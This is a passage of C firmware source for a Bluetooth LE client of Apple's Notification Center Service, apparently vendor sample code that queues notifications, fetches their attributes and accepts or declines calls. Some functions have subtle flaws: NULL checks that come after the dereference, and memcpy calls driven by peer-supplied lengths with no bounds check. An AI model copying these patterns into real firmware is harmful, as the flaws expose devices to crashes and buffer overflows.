incomingCallUID[ANCS_NOTIF_UID_LENGTH] = { 0x00 };\n\n// Holds the value for whether or not there is an incomingCall type notification in the queue.\nstatic bool haveIncomingCall = FALSE;\n\n// Points to the head of the queue.\nstatic notifQueueNode_t *pNotifQueueFront = NULL;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\n// Basic link-list structure queue functions.\nstatic void Ancs_findAndRemoveFromQueue(uint8_t *pNotifUID);\nstatic notifQueueNode_t* Ancs_findNotifInQueue(uint8_t *pNotifUID);\n void Ancs_popAllNotifsFromQueue(void);\nstatic void Ancs_popNotifFromQueue(void);\nstatic void Ancs_pushNotifToQueue(uint8_t categoryID, uint8_t *pNotifUID);\nstatic bool Ancs_queueEmpty(void);\nstatic uint8_t Ancs_queueSize(void);\n\n// Functions used to process incoming GATT notifications from the\n// Notification Source and Data Source, and request additional data.\n void Ancs_acceptIncomingCall(void);\nstatic uint8_t Ancs_CCCDConfig(uint16_t attrHdl, uint8_t isEnable);\n void Ancs_declineIncomingCall(void);\nstatic uint8_t Ancs_getNotifAttr(uint8_t *pNotificationUID, uint8_t attributeID, uint16_t len);\nstatic uint8_t Ancs_getAppAttr(uint8_t *appID, uint8_t attributeID);\nstatic void Ancs_handleNotifAttrRsp(uint8_t *pNotificationUID);\nstatic uint8_t Ancs_performNegativeAction(uint8_t *notifUID);\nstatic uint8_t Ancs_performPositiveAction(uint8_t *notifUID);\nstatic void Ancs_processAppAttr(gattMsgEvent_t *pMsg);\n void Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg);\nstatic void Ancs_processNotifications(void);\nstatic void Ancs_processNotificationServiceNotif(notifQueueNode_t *pNotif);\nstatic void Ancs_printNotifDate(uint8_t* dataBuf);\n void Ancs_queueNewNotif(gattMsgEvent_t *pMsg);\n uint8_t Ancs_subsDataSrc(void);\n uint8_t Ancs_subsNotifSrc(void);\n\n/*********************************************************************\n * QUEUE FUNCTIONS (In alphabetical order)\n */\n\n\n\n/*********************************************************************\n * @fn Ancs_findAndRemoveFromQueue\n *\n * @brief Find a specific notification and remove it from the queue\n *\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic void Ancs_findAndRemoveFromQueue(uint8_t *pNotifUID)\n{\n if (pNotifQueueFront == NULL)\n return;\n notifQueueNode_t *pSearch;\n notifQueueNode_t *pSearchLast;\n pSearch = pNotifQueueFront;\n pSearchLast = pNotifQueueFront;\n\n uint8_t notifUID[ANCS_NOTIF_UID_LENGTH];\n VOID memcpy(notifUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n\n while ((memcmp(notifUID, pSearch->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH) != 0) && pSearch != NULL)\n {\n pSearchLast = pSearch;\n pSearch = pSearch->pNext;\n }\n\n if (pSearch != NULL)\n {\n pSearchLast->pNext = pSearch->pNext;\n ICall_free(pSearch);\n Ancs_queueSize();\n }\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_findNotifInQueue\n *\n * @brief Find a Notification & Category in the existing list\n *\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic notifQueueNode_t* Ancs_findNotifInQueue(uint8_t *pNotifUID)\n{\n notifQueueNode_t *pSearch;\n uint8_t notifUID[ANCS_NOTIF_UID_LENGTH];\n\n VOID memcpy(notifUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n\n pSearch = pNotifQueueFront;\n while ((memcmp(notifUID, pSearch->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH) != 0) && pSearch != NULL)\n {\n pSearch = pSearch->pNext;\n }\n\n if (pSearch == NULL) // Not in the list\n return NULL;\n\n else\n return pSearch;\n}\n\n/*********************************************************************\n * @fn Ancs_popAllNotifsFromQueue\n *\n * @brief Clear the queue of all notifications\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_popAllNotifsFromQueue(void)\n{\n notifQueueNode_t *pSearch;\n notifQueueNode_t *pDelete;\n\n pSearch = pNotifQueueFront;\n\n while (pSearch != NULL)\n {\n pDelete = pSearch;\n pSearch = pSearch->pNext;\n ICall_free(pDelete);\n pDelete = NULL;\n }\n pNotifQueueFront = NULL;\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_popNotifFromQueue\n *\n * @brief Move to the front of the queue to the next element and delete the old front\n *\n * @param none\n *\n * @return none\n */\nstatic void Ancs_popNotifFromQueue(void)\n{\n if ( pNotifQueueFront == NULL)\n return;\n\n notifQueueNode_t *pFrontOld;\n pFrontOld = pNotifQueueFront;\n\n pNotifQueueFront = pNotifQueueFront->pNext;\n ICall_free(pFrontOld);\n Ancs_queueSize();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_pushNotifToQueue\n *\n * @brief Add a Notification & Category to list\n *\n * @param categoryID - category ID of the notification\n * @param pNotifUID - notification UID\n *\n * @return none\n */\nstatic void Ancs_pushNotifToQueue(uint8_t categoryID, uint8_t *pNotifUID)\n{\n notifQueueNode_t *pNew;\n notifQueueNode_t *pSearch;\n\n pNew = ICall_malloc(sizeof(notifQueueNode_t));\n if (pNew == NULL)\n return;\n\n // Store categoryID and notification ID.\n pNew->notifData.categoryID = categoryID;\n VOID memcpy(pNew->notifData.notificationUID, pNotifUID, ANCS_NOTIF_UID_LENGTH);\n pNew->notifData.currentState = NOTI_ATTR_ID_BEGIN;\n pNew->notifData.requestedAttrs = 0;\n pNew->pNext = NULL;\n\n if (pNotifQueueFront == NULL) // New list\n {\n pNotifQueueFront = pNew;\n }\n else // Add to the last position of the list\n {\n pSearch = pNotifQueueFront;\n while (pSearch->pNext != NULL)\n {\n pSearch = pSearch->pNext;\n }\n pSearch->pNext = pNew;\n }\n Ancs_queueSize();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_queueEmpty\n *\n * @brief Indicate if the notification queue is empty or not.\n *\n * @param none\n *\n * @return bool - Return TRUE if pNotifQueueFront equals NULL, FALSE else.\n */\nstatic bool Ancs_queueEmpty(void)\n{\n return (pNotifQueueFront == NULL);\n}\n\n/*********************************************************************\n * @fn Ancs_queueSize\n *\n * @brief Print the current size of the notification queue.\n *\n * @param none\n *\n * @return uint8_t - Number of notifications in the queue.\n */\nstatic uint8_t Ancs_queueSize(void)\n{\n uint8_t notifCount = 0;\n notifQueueNode_t *pCount;\n pCount = pNotifQueueFront;\n\n while(pCount != NULL)\n {\n notifCount++;\n pCount = pCount->pNext;\n }\n Display_print1(dispHandle, 4, 0, \"Total Notifications:\\t%d\", notifCount);\n\n return notifCount;\n}\n\n/*********************************************************************\n * NOTIFICATION FUNCTIONS (In alphabetical order)\n */\n\n/*********************************************************************\n * @fn Ancs_acceptIncomingCall\n *\n * @brief Accept an incoming phone call.\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_acceptIncomingCall(void)\n{\n if(haveIncomingCall == TRUE)\n {\n Ancs_performPositiveAction(incomingCallUID);\n haveIncomingCall = FALSE;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tAccept Incoming Call\");\n#endif\n Display_print0(dispHandle, 16, 0, \"Accepted Incoming Call\");\n }\n}\n\n/*********************************************************************\n * @fn Ancs_CCCDConfig\n *\n * @brief subscribe Notification Source.\n *\n * @param none.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_CCCDConfig(uint16_t attrHdl, uint8_t isEnable)\n{\n // Declare return variable status.\n uint8_t status;\n\n // Stores the GATT write request parameters.\n attWriteReq_t req;\n\n // Allocate memory for the request.\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, 2, NULL);\n\n // If the allocation failed, return FAILURE.\n if (req.pValue == NULL)\n status = FAILURE;\n\n // Else, prepare the request.\n else\n {\n // Set the data length to 2 (\"01\" = 2 bytes).\n req.len = 2;\n\n // If we are enabling notifications, set the write data to \"01\".\n if (isEnable == TRUE)\n {\n req.pValue[0] = LO_UINT16(GATT_CLIENT_CFG_NOTIFY);\n req.pValue[1] = HI_UINT16(GATT_CLIENT_CFG_NOTIFY);\n }\n\n // Else, disable notifications, thus set the write data to \"00\".\n else\n {\n req.pValue[0] = 0x00;\n req.pValue[1] = 0x00;\n }\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Set the handle to the passed value (either the Notification Source's CCCD handle\n // or the Data Source's CCCD handle).\n req.handle = attrHdl;\n\n // Send write request. If it fails, free the memory allocated and\n // return a failure.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if ( status != SUCCESS)\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_declineIncomingCall\n *\n * @brief Reject an incoming phone call.\n *\n * @param none\n *\n * @return none\n */\nvoid Ancs_declineIncomingCall(void)\n{\n if(haveIncomingCall == TRUE)\n {\n Ancs_performNegativeAction(incomingCallUID);\n haveIncomingCall = FALSE;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDeclined Incoming Call\");\n#endif\n Display_print0(dispHandle, 16, 0, \"Declined Incoming Call\");\n }\n}\n\n/*********************************************************************\n * @fn Ancs_getNotifAttr\n *\n * @brief Get notification attributes.\n *\n * @param pNotificationUID - notification's ID.\n *\n * @param attributeID - attribute's ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_getNotifAttr(uint8_t *pNotificationUID, uint8_t attributeID, uint16_t len)\n{\n uint8_t status;\n uint8_t cmdLen = 8;\n if (len == 0)\n cmdLen = 6;\n\n // Do a write\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, cmdLen, NULL);\n uint8_t *requestPayload = req.pValue;\n if (req.pValue != NULL)\n {\n // Get the ANCS control point handle.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set command length.\n req.len = cmdLen;\n\n // Set Command ID.\n *requestPayload = COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES;\n requestPayload++;\n\n // Set NotificationUID\n VOID memcpy(requestPayload, pNotificationUID, ANCS_NOTIF_UID_LENGTH);\n requestPayload += ANCS_NOTIF_UID_LENGTH;\n\n // Set attributeID\n *requestPayload = attributeID;\n requestPayload++;\n\n // Set length to desired max length to be retrieved.\n *requestPayload = LO_UINT16(len);\n requestPayload++;\n *requestPayload = HI_UINT16(len);\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Execute the write.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if (status != SUCCESS)\n {\n // If it fails free the message.\n Display_print1(dispHandle, 10, 0, \"CP WRITE ERROR:\\t%d\",status);\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_getAppAttr\n *\n * @brief Get application attributes.\n *\n * @param appID - applciation's ID\n *\n * @param attributeID - attribute's ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic uint8_t Ancs_getAppAttr(uint8_t *appID, uint8_t attributeID)\n{\n uint8_t status;\n\n uint8_t *lenCheck = appID;\n uint8_t appIDLen = 0;\n\n while(*lenCheck != '\\0')\n {\n lenCheck++;\n appIDLen++;\n }\n\n // Add 1 for the NULL terminator.\n appIDLen++;\n\n\n // 1 for Command ID, Length of the AppID, 1 for the AttrID\n uint8_t cmdLen = 1 + appIDLen + 1;\n\n // Do a write\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc(Ancs_connHandle, ATT_WRITE_REQ, cmdLen, NULL);\n uint8_t *requestPayload = req.pValue;\n if (req.pValue != NULL)\n {\n // Get the ANCS control point handle.\n req.handle = Ancs_handleCache[ANCS_CTRL_POINT_HDL_START];\n\n // Set command length.\n req.len = cmdLen;\n\n // Set Command ID.\n *requestPayload = COMMAND_ID_GET_APP_ATTRIBUTES;\n requestPayload++;\n\n // Set AppID\n VOID memcpy(requestPayload, appID, appIDLen);\n requestPayload += appIDLen;\n\n // Set attributeID\n *requestPayload = attributeID;\n requestPayload++;\n\n // Signature and command must be set to zero.\n req.sig = 0;\n req.cmd = 0;\n\n // Execute the write.\n status = GATT_WriteCharValue(Ancs_connHandle, &req, ICall_getEntityId());\n if (status != SUCCESS)\n {\n // If it fails free the message.\n Display_print1(dispHandle, 10, 0, \"CP WRITE ERROR:\\t%d\",status);\n GATT_bm_free((gattMsg_t *) &req, ATT_WRITE_REQ);\n }\n }\n\n return status;\n}\n\n/*********************************************************************\n * @fn Ancs_handleNotifAttrRsp\n *\n * @brief Handle response value of Notification Attributes from iOS device.\n *\n * @param attrID - attributes ID.\n *\n * @return uint8_t SUCCESS/FAILURE\n */\nstatic void Ancs_handleNotifAttrRsp(uint8_t *pNotificationUID)\n{\n // Will store the queue node with the passed notification UID.\n notifQueueNode_t *pNode;\n\n // Retrieve the notification with the passed UID.\n pNode = Ancs_findNotifInQueue(pNotificationUID);\n\n switch ( pNode->notifData.currentState )\n {\n // The initial state is used to kick-off the state machine and\n // immediately proceed to the AppID state (hence the missing break).\n case NOTI_ATTR_ID_BEGIN:\n pNode->notifData.currentState = NOTI_ATTR_ID_APPID;\n\n // If the AppID request flag hasn't been set, request the AppID attribute\n // data and set the AppID request flag.\n case NOTI_ATTR_ID_APPID:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_APPID) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER, ATTR_APPID_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_APPID;\n }\n break;\n\n case APP_ATTR_ID_DN:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_DS) )\n {\n Ancs_getAppAttr(dataBuf, APP_ATTRIBUTE_ID_DISPLAY_NAME);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_DS;\n }\n break;\n\n // If the Title request flag hasn't been set, request the Title attribute\n // data and set the Title request flag.\n case NOTI_ATTR_ID_TITLE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_TITLE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_TITLE, ATTR_TITLE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_TITLE;\n }\n break;\n\n // If the Subtitle request flag hasn't been set, request the Subtitle attribute\n // data and set the Subtitle request flag.\n case NOTI_ATTR_ID_SUBTITLE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_SUBTITLE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_SUBTITLE, ATTR_SUBTITLE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_SUBTITLE;\n }\n break;\n\n // If the Message request flag hasn't been set, request the Message attribute\n // data and set the Message request flag.\n case NOTI_ATTR_ID_MESSAGE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_MESSAGE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_MESSAGE, ATTR_MESSAGE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_MESSAGE;\n }\n break;\n\n // If the Message Size request flag hasn't been set, request the Message Size attribute\n // data and set the Message Size request flag.\n case NOTI_ATTR_ID_MESSAGE_SIZE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_MESSAGE_SIZE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_MESSAGE_SIZE, ATTR_MESSAGE_SIZE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_MESSAGE_SIZE;\n }\n break;\n\n // If the Date request flag hasn't been set, request the Date attribute\n // data and set the Date request flag.\n case NOTI_ATTR_ID_DATE:\n if( !(pNode->notifData.requestedAttrs & REQUESTED_ATTR_ID_DATE) )\n {\n Ancs_getNotifAttr(pNotificationUID, NOTIFICATION_ATTRIBUTE_ID_DATE, ATTR_DATE_REQUEST_SIZE);\n pNode->notifData.requestedAttrs |= REQUESTED_ATTR_ID_DATE;\n }\n break;\n\n // End state, do nothing but signify all requests have been made.\n case NOTI_ATTR_ID_END:\n break;\n\n default:\n break;\n\n }\n return;\n}\n\n\n/*********************************************************************\n * @fn Ancs_processAppAttr\n *\n * @brief Extract and reassemble the retrieved data from the Data Source notification (App attributes)\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nstatic void Ancs_processAppAttr(gattMsgEvent_t *pMsg)\n{\n // Pointer to the GATT Msg data.\n uint8_t *packetData;\n\n // The variable that will keep track of the ANCS attribute\n // currently being processed.\n static uint8_t AttrID;\n\n // The variable will keep track of the current index the data\n // buffer will be written to if more than one packet is needed.\n static uint8_t currentDataBufWriteIndex;\n\n // Point to the GATT Msg data\n packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Check if this is the first retrieved packet for potentially\n // a set of packets to be sent by the ANCS Data Service.\n switch(notifAttrPktProcessState)\n {\n case NOTI_ATTR_FIRST_PKT:\n {\n // Tracks the metadata length of the first packet.\n uint8_t responseLen = 0;\n\n // Initialize the data buffer write index to zero, as this is\n // the first packet.\n currentDataBufWriteIndex = 0;\n\n // Ensure Command ID is equal to zero as stated in the spec.\n if (*packetData != COMMAND_ID_GET_APP_ATTRIBUTES)\n return;\n packetData++;\n responseLen++;\n\n // Skip the appID.\n while(*packetData != '\\0')\n {\n packetData++;\n responseLen++;\n }\n\n // Skip the NULL terminator.\n packetData++;\n responseLen++;\n\n // Store the ANCS attribute ID of the retrieved attribute.\n AttrID = *packetData;\n packetData++;\n responseLen++;\n\n // Store the 2-byte length of the data that is being retrieved.\n dataLen = BUILD_UINT16(*packetData, *(packetData + 1));\n\n // Check if the length is zero, if so the notification does not\n // have the specified attribute as stated in the ANCS spec.\n if ( dataLen == 0 )\n {\n if (AttrID == APP_ATTRIBUTE_ID_DISPLAY_NAME)\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tNot available\");\n // pNotifQueueFront->notifData.currentState++;\n pNotifQueueFront->notifData.currentState++;\n Ancs_processNotifications();\n\n return;\n }\n\n // Move the pointer to the data portion.\n packetData += 2;\n responseLen += 2;\n\n // Clear the data buffer in preparation for the new data.\n VOID memset(dataBuf, '\\0', DATA_BUFFER_SIZE);\n\n // If the data length specified in the first ANCS Data Service notification\n // is greater than the number of bytes that was sent in the\n // first data packet(total GATT msg length - request metadata), the data will be split into multiple packets.\n if (dataLen > pMsg->msg.handleValueNoti.len - responseLen)\n {\n // Copy the number of bytes that were sent in the\n // first packet to the data buffer, then set the\n // data buffer write index, and set the state from first packet\n // to continued packet.\n VOID memcpy(dataBuf, packetData, (pMsg->msg.handleValueNoti.len - responseLen));\n currentDataBufWriteIndex = (pMsg->msg.handleValueNoti.len - responseLen);\n appAttrPktProcessState = NOTI_ATTR_CONTINUE_PKT;\n\n // Subtract the number of data bytes contained in the first packet\n // from the total number of expected data bytes.\n dataLen -= (pMsg->msg.handleValueNoti.len - responseLen);\n return;\n }\n else\n {\n // In this case all the ANCS attribute data was contained in\n // the first packet so the data is copied, and both the index and\n // length are reset.\n VOID memcpy(dataBuf, packetData, dataLen);\n currentDataBufWriteIndex = 0;\n dataLen = 0x0000;\n }\n }\n\n case NOTI_ATTR_CONTINUE_PKT:\n {\n if (dataLen > 0)\n {\n // Copy all the data from the notification packet to the data buffer\n // starting from the current data buffer write index.\n VOID memcpy(dataBuf + currentDataBufWriteIndex, pMsg->msg.handleValueNoti.pValue,\n pMsg->msg.handleValueNoti.len);\n // Subtract the number of data bytes contained in the packet from\n // the total, and increase the data buffer write index by that amount.\n dataLen -= pMsg->msg.handleValueNoti.len;\n currentDataBufWriteIndex += pMsg->msg.handleValueNoti.len;\n\n // Checks if this is the last the continued packet.\n if (dataLen == 0x0000)\n {\n // If so reset the write index and the state.\n currentDataBufWriteIndex = 0;\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n }\n }\n break;\n\n default:\n break;\n }\n\n // Now we have real data, to display it on LCD for demo now,\n // customer needs to change it from here to deal with data\n if (dataLen == 0)\n {\n pNotifQueueFront->notifData.currentState++;\n\n if (AttrID == APP_ATTRIBUTE_ID_DISPLAY_NAME)\n Display_print1(dispHandle, 7, 0, \"* App Name:\\t%s\", (char* )dataBuf);\n }\n // Check if the dataLen variable was overflowed if packets got mismatched.\n // This may occur if rapid connecting and disconnecting to the device is performed.\n else if(dataLen > DATA_BUFFER_SIZE - 1)\n {\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tDATA CURRUPTED\");\n Ancs_findAndRemoveFromQueue(currentNotifUID);\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n // Continue processing the current notification.\n Ancs_processNotifications();\n}\n\n/*********************************************************************\n * @fn Ancs_processDataServiceNotif\n *\n * @brief Extract and reassemble the retrieved data from the Data Source notifications\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nvoid Ancs_processDataServiceNotif(gattMsgEvent_t *pMsg)\n{\n // Pointer to the GATT Msg data.\n uint8_t *packetData;\n\n // The variable that will keep track of the ANCS attribute\n // currently being processed.\n static uint8_t AttrID;\n\n // The variable will keep track of the current index the data\n // buffer will be written to if more than one packet is needed.\n static uint8_t currentDataBufWriteIndex;\n\n // Point to the GATT Msg data\n packetData = pMsg->msg.handleValueNoti.pValue;\n\n // Check if this is the first retrieved packet for potentially\n // a set of packets to be sent by the ANCS Data Service.\n switch(notifAttrPktProcessState)\n {\n case NOTI_ATTR_FIRST_PKT:\n {\n // Initialize the data buffer write index to zero, as this is\n // the first packet.\n currentDataBufWriteIndex = 0;\n\n // Ensure Command ID is equal to zero as stated in the spec.\n if (*packetData != COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES)\n {\n if(*packetData == COMMAND_ID_GET_APP_ATTRIBUTES)\n {\n Ancs_processAppAttr(pMsg);\n }\n return;\n }\n packetData++;\n\n // Copy the ANCS notification UID so it may be used by\n // to perform a positive or negative action is desired.\n VOID memcpy(currentNotifUID, packetData, ANCS_NOTIF_UID_LENGTH);\n\n packetData += ANCS_NOTIF_UID_LENGTH;\n\n // Store the ANCS attribute ID of the retrieved attribute.\n AttrID = *packetData;\n packetData++;\n\n // Store the 2-byte length of the data that is being retrieved.\n dataLen = BUILD_UINT16(*packetData, *(packetData + 1));\n\n // Check if the length is zero, if so the notification does not\n // have the specified attribute as stated in the ANCS spec.\n if ( dataLen == 0 )\n {\n if (AttrID == NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER)\n Display_print0(dispHandle, 7, 0, \"* AppID:\\tNot available\");\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_TITLE)\n Display_print0(dispHandle, 8, 0, \"* Title:\\tNot available\");\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_MESSAGE)\n {\n Display_print0(dispHandle, 9, 0, \"* Message:\\tNot available\");\n }\n pNotifQueueFront->notifData.currentState++;\n\n Ancs_processNotifications();\n\n return;\n }\n // Move the pointer to the data portion.\n packetData += 2;\n\n // Clear the data buffer in preparation for the new data.\n VOID memset(dataBuf, '\\0', DATA_BUFFER_SIZE);\n\n // If the data length specified in the first ANCS Data Service notification\n // is greater than the number of bytes that was sent in the\n // first data packet(total GATT msg length - request metadata), the data will be split into multiple packets.\n if (dataLen > pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH)\n {\n // Copy the number of bytes that were sent in the\n // first packet to the data buffer, then set the\n // data buffer write index, and set the state from first packet\n // to continued packet.\n VOID memcpy(dataBuf, packetData, (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH));\n currentDataBufWriteIndex = (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH);\n notifAttrPktProcessState = NOTI_ATTR_CONTINUE_PKT;\n\n // Subtract the number of data bytes contained in the first packet\n // from the total number of expected data bytes.\n dataLen -= (pMsg->msg.handleValueNoti.len - NOTIF_ATTR_REQUEST_METADATA_LENGTH);\n return;\n }\n else\n {\n // In this case all the ANCS attribute data was contained in\n // the first packet so the data is copied, and both the index and\n // length are reset.\n VOID memcpy(dataBuf, packetData, dataLen);\n currentDataBufWriteIndex = 0;\n dataLen = 0x0000;\n }\n }\n break;\n\n // Check if the is a continued data packet.\n case NOTI_ATTR_CONTINUE_PKT:\n {\n if (dataLen > 0)\n {\n // Copy all the data from the notification packet to the data buffer\n // starting from the current data buffer write index.\n VOID memcpy(dataBuf + currentDataBufWriteIndex, pMsg->msg.handleValueNoti.pValue,\n pMsg->msg.handleValueNoti.len);\n // Subtract the number of data bytes contained in the packet from\n // the total, and increase the data buffer write index by that amount.\n dataLen -= pMsg->msg.handleValueNoti.len;\n currentDataBufWriteIndex += pMsg->msg.handleValueNoti.len;\n\n // Checks if this is the last the continued packet.\n if (dataLen == 0x0000)\n {\n // If so reset the write index and the state.\n currentDataBufWriteIndex = 0;\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n }\n }\n break;\n\n default:\n break;\n }\n\n // Now we have real data, to display it on LCD for demo now,\n // customer needs to change it from here to deal with data\n if (dataLen == 0)\n {\n pNotifQueueFront->notifData.currentState++;\n\n if (AttrID == NOTIFICATION_ATTRIBUTE_ID_APP_IDENTIFIER)\n Display_print1(dispHandle, 7, 0, \"* AppID:\\t%s\", (char* )dataBuf);\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_TITLE)\n Display_print1(dispHandle, 8, 0, \"* Title:\\t%s\", (char* )dataBuf);\n\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_MESSAGE)\n Display_print1(dispHandle, 9, 0, \"* Message:\\t%s\", (char* )dataBuf);\n\n else if (AttrID == NOTIFICATION_ATTRIBUTE_ID_DATE)\n Ancs_printNotifDate(dataBuf);\n }\n // Check if the dataLen variable was overflowed if packets got mismatched.\n // This may occur if rapid connecting and disconnecting to the device is performed.\n else if(dataLen > DATA_BUFFER_SIZE - 1)\n {\n Display_print0(dispHandle, 7, 0, \"* AppID:\\tDATA CURRUPTED\");\n Display_print0(dispHandle, 7, 0, \"* App Name:\\tDATA CURRUPTED\");\n Display_print0(dispHandle, 8, 0, \"* Title:\\tDATA CURRUPTED\");\n Display_print0(dispHandle, 9, 0, \"* Message:\\tDATA CURRUPTED\");\n Display_print0(dispHandle, 10, 0, \"* Date:\\t\\tDATA CURRUPTED\");\n Ancs_findAndRemoveFromQueue(currentNotifUID);\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n }\n // Continue processing the current notification.\n Ancs_processNotifications();\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_processNotifications\n *\n * @brief Process the front notification in ANCS notification queue.\n *\n * @param none\n *\n * @return none\n */\nstatic void Ancs_processNotifications(void)\n{\n // Check if the notification queue is empty. If it is, return.\n if(!Ancs_queueEmpty())\n {\n // If not check if the current notification is in its finished state.\n // If it is, remove it from the queue.\n if( pNotifQueueFront->notifData.currentState == NOTI_ATTR_ID_END )\n Ancs_popNotifFromQueue();\n\n // Process the notification currently at the front of the queue.\n Ancs_processNotificationServiceNotif(pNotifQueueFront);\n }\n\n return;\n}\n\n/*********************************************************************\n * @fn Ancs_processNotificationServiceNotif\n *\n * @brief Process ANCS Notification Service notifications\n *\n * @param pMsg - GATT message.\n *\n * @return none\n */\nstatic void Ancs_processNotificationServiceNotif(notifQueueNode_t *pNotif)\n{\n\n // If the notification is in its initial state, display its category.\n if ( pNotifQueueFront->notifData.currentState == NOTI_ATTR_ID_BEGIN )\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"New Notification\");\n#endif\n switch (pNotif->notifData.categoryID)\n {\n case CATEGORY_ID_OTHER:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tOther\");\n break;\n\n case CATEGORY_ID_INCOMING_CALL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tIncomingCall\");\n haveIncomingCall = TRUE;\n memcpy(incomingCallUID, pNotif->notifData.notificationUID, ANCS_NOTIF_UID_LENGTH);\n break;\n\n case CATEGORY_ID_MISSED_CALL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tMissedCall\");\n haveIncomingCall = FALSE;\n break;\n\n case CATEGORY_ID_VOICEMAIL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tVoicemail\");\n break;\n\n case CATEGORY_ID_SOCIAL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tSocial\");\n break;\n\n case CATEGORY_ID_SCHEDULE:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tSchedule\");\n break;\n\n case CATEGORY_ID_EMAIL:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tEmail\");\n break;\n\n case CATEGORY_ID_NEWS:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tNews\");\n break;\n\n case CATEGORY_ID_HEALTH_AND_FITNESS:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tHealth And Fitness\");\n break;\n\n case CATEGORY_ID_BUSINESS_AND_FINANCE:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tBusiness And Finance\");\n break;\n\n case CATEGORY_ID_LOCATION:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tLocation\");\n break;\n\n case CATEGORY_ID_ENTERTAINMENT:\n Display_print0(dispHandle, 6, 0, \"* Category:\\tEntertainment\");\n break;\n\n default:\n break;\n\n }\n }\n\n // Move to the attribute retrieval state 